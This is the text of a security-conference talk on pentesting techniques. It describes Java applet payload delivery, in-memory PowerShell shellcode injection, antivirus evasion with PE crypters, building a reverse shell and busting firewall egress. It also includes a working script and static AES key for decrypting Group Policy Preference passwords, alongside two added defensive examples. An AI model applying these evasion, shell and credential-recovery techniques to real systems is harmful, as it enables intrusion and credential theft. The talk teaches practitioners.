BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com @TrustedSec
Introduction As penetration testers, exploit writers, huggers, etc., we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.
The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known. Why show you? I'm an open book on everything I do, and sharing is what it's all about.
Technique #1 Java Applet Attack (SET) Well-known attack method, right? Do you know how it actually works? Do you know the techniques behind it that make it successful?
ZOMG APT News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How did people find out it was SET?
ILIKEHUGS
DEMO: Walking through the Attack
Explaining the Applet Parameters that are injected into the HTML code are pulled from the Applet. Obfuscated and randomized each time. Parameters tell the Applet which attacks to use.
Method 1 Binary Dropper The binary is downloaded from the attacker machine via a web server (Java downloader). The binary is obfuscated each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).
DEMO: Binary Dropping Technique
Method 1 Weak Sauce Binaries are easily picked up by AV if signatures focus on the obfuscation techniques (SET changes them each version). Direct interaction with the Windows file system and writing to disk. Multiple points of evidence on the victim machine.
Method 2 Shellcodeexec The Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. The executable takes the alphanumeric shellcode as its int main(int argc, char *argv[]) argument. It uses VirtualAlloc to obtain read, write, and execute memory space. The alphanumeric shellcode is executed in memory and the payload is delivered.
DEMO: ShellcodeExec
Method 2 Easily Detectable Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1, binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk. Like Method 1, multiple points of evidence on the victim machine.
Method 3 PowerShell Injection Detect if PowerShell is installed (installed by default on Vista and Windows 7 and 8). PowerShell gives us complete flexibility in a number of post-exploitation situations. Technique discovered by Matthew Graeber (you rock).
Method 3 PS Shellcode Injection The applet detects if PowerShell is installed on the system, grabs the operating system type (x86 / x64), and deploys the shellcode straight through PowerShell.
DEMO: ShellcodeExec
Method 3 PowerShell Injection Never touches disk, so AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely difficult. Extremely reliable and stable.
PE Security Evasion
Scenario 1 Dropping PEs Like It's Hot You're using Metasploit and all of your binaries are being picked up by AV, HIPS, etc. In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion. Couple of cool ways to do this.
Modifying PE For Evasion in MSF The easiest way for me is to make a simple program that creates an RWX process and then has the program execute the Metasploit shellcode. You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net). It encrypts the PE file with AES-128 using a randomized simple cipher key. When the executable is run, it brute-forces the AES key and then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryption Very cool concept, easy to use, and easy to write one for yourself. Ability to have a completely unique PE file each time. Slight downfall: the stub used for the brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell Connects out to the attacker (reverse shell).
Compiling Binaries PyInstaller Compiles your Python code into a binary by wrapping the Python interpreter into the executable. Works on Linux, OSX, and Windows.
python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist
Making it easy pybuild.py All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall A number of companies restrict ports outbound and only allow what's needed for the business. Trouble getting payloads out, especially if you only have one shot.
Egress Busting A few ways to do it: a pre-staged payload for identifying the way out, or attempting a staged reverse on every port. Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2 Server/client situation where the victim connects out on every port, 1024 ports at a time. The server listens for the connection and reports back. Here's where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell Released this week! Allows you to bust all ports inside the firewall and spawn a command shell. Custom, so no AV picks this up. Byte-compiled into an executable.
DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage On a recent penetration test I found file upload + execute binaries. Could not find a standard port out, e.g. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.
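From the defender's side, the port-by-port sweep described above leaves a very distinctive trace in the firewall's outbound logs: one internal host touching hundreds of distinct destination ports on a single external address within seconds. The following is an added example, not code from the talk or the Egress Buster tool; the key=value log format, the 60-second window and the 50-port threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed key=value firewall log format, constructed for this example.
LINE_RE = re.compile(r"^(?P<ts>\d+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
                     r"dport=(?P<dport>\d+) action=(?P<action>\w+)$")

def parse_line(line):
    """Return (ts, src, dst, dport, action), or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return int(m["ts"]), m["src"], m["dst"], int(m["dport"]), m["action"]

def find_port_sweeps(lines, window=60, min_ports=50):
    """Flag (src, dst) pairs that touch at least min_ports distinct destination
    ports within any `window` seconds; returns {(src, dst): distinct ports seen}.
    Denied and allowed attempts both count: the sweep itself is the signal."""
    events = defaultdict(list)  # (src, dst) -> [(ts, dport), ...]
    for ts, src, dst, dport, _ in filter(None, map(parse_line, lines)):
        events[(src, dst)].append((ts, dport))
    flagged = {}
    for pair, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:  # slide window forward
                start += 1
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                flagged[pair] = max(len(ports), flagged.get(pair, 0))
    return flagged

def allowed_ports(lines, src, dst):
    """Ports the firewall let through for a flagged pair: the holes to close."""
    return sorted({r[3] for r in map(parse_line, lines)
                   if r and r[1] == src and r[2] == dst and r[4] == "allow"})

# Constructed sample log: 10.0.0.5 sweeps 120 ports on 203.0.113.10 within 30 s
# (two get through); 10.0.0.9 only talks HTTPS to 198.51.100.7.
SAMPLE_LOG = [f"{1000 + i // 4} src=10.0.0.5 dst=203.0.113.10 dport={1025 + i} "
              f"action={'allow' if i in (7, 42) else 'deny'}" for i in range(120)]
SAMPLE_LOG += [f"{1000 + i} src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow"
               for i in range(40)]

if __name__ == "__main__":
    for (src, dst), n in find_port_sweeps(SAMPLE_LOG).items():
        print(f"sweep {src} -> {dst}: {n} ports tried, "
              f"allowed: {allowed_ports(SAMPLE_LOG, src, dst)}")
```

The allowed ports reported for a flagged pair are the obscure egress holes the talk describes finding; those are the rules to review.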
Fun with Group Policy
One of my PERSONAL Favorites How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from the Sogeti ESEC Pentest article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
The Attack Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID, then MACHINE\Preferences\Groups. Look for the Groups.xml file.
Contents of File
Static Key for AES, Anyone?
Python Code
# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
from base64 import b64decode
from Crypto.Cipher import AES  # PyCryptodome; the original ran under Python 2 / PyCrypto

# Microsoft's published static 32-byte AES key for Group Policy Preference cpassword values
key = bytes.fromhex("4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 "
                    "f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b")
# the documented example cpassword value
cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")
# AES-CBC with an all-zero IV (PyCrypto's default IV when none was given)
o = AES.new(key, AES.MODE_CBC, iv=bytes(16)).decrypt(cpassword)
# strip the PKCS#7 padding, then decode the UTF-16LE plaintext
print(o[:-o[-1]].decode("utf-16-le"))
Decrypted Password
>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!
Expanding on Groups.xml
More Passwords Stored The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers, and much more are impacted.
List of Other Affected Areas (from rewt dance)
Services\Services.xml: http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
ScheduledTasks\ScheduledTasks.xml: http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13), http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13), http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
Printers\Printers.xml: http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
Drives\Drives.xml: http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
DataSources\DataSources.xml: http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
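Because the static key is public, the only real fix is to find and remove every cpassword attribute still sitting in SYSVOL. The following audit is an added example (not code from the talk or from rewt dance) that walks a Policies tree and reports each preference item, across all the file types listed above, whose Properties element still carries a non-empty cpassword; it never decrypts anything. The XML samples are constructed (clsid attributes omitted) and reuse the documented example cpassword value shown earlier.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files named above; each stores credentials on a <Properties> element.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml"}
# Attribute naming the account, which differs per preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def find_cpasswords(xml_text, source):
    """Return [(source, item_tag, account, cpassword)] for every preference item
    whose <Properties> still carries a non-empty cpassword attribute."""
    findings = []
    for item in ET.fromstring(xml_text).iter():
        for props in item.findall("Properties"):
            cpw = props.get("cpassword")
            if cpw:  # cpassword="" means the password was already cleared
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
                findings.append((source, item.tag, account, cpw))
    return findings

def audit_sysvol(policies_dir):
    """Walk a local copy of the domain's SYSVOL Policies folder and collect
    findings from every GPP file type listed above."""
    findings = []
    for path in Path(policies_dir).rglob("*.xml"):
        if path.name in GPP_FILES:  # GPP files are UTF-8 with a BOM
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings

# Constructed samples: one cleared password, two that must be remediated.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin" status="localadmin">
    <Properties action="U" userName="localadmin" changeLogon="0" neverExpires="1"
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="/>
  </User>
  <User name="helpdesk" status="helpdesk">
    <Properties action="U" userName="helpdesk" cpassword=""/>
  </User>
</Groups>"""
SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="Backup Agent">
    <Properties startupType="AUTOMATIC" serviceName="BackupAgent" accountName="CORP\\svc_backup"
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="/>
  </NTService>
</NTServices>"""

if __name__ == "__main__":
    for src, tag, account, cpw in (find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")
                                   + find_cpasswords(SAMPLE_SERVICES_XML, "Services.xml")):
        print(f"{src}: <{tag}> account={account!r} cpassword present ({len(cpw)} chars)")
```

Every finding means the password in that item is recoverable by any domain user and the account should be rotated after the preference is removed.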
There's a ton more of these. Hopefully I can make these a series.
Downloads For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com TrustedSec, LLC @TrustedSec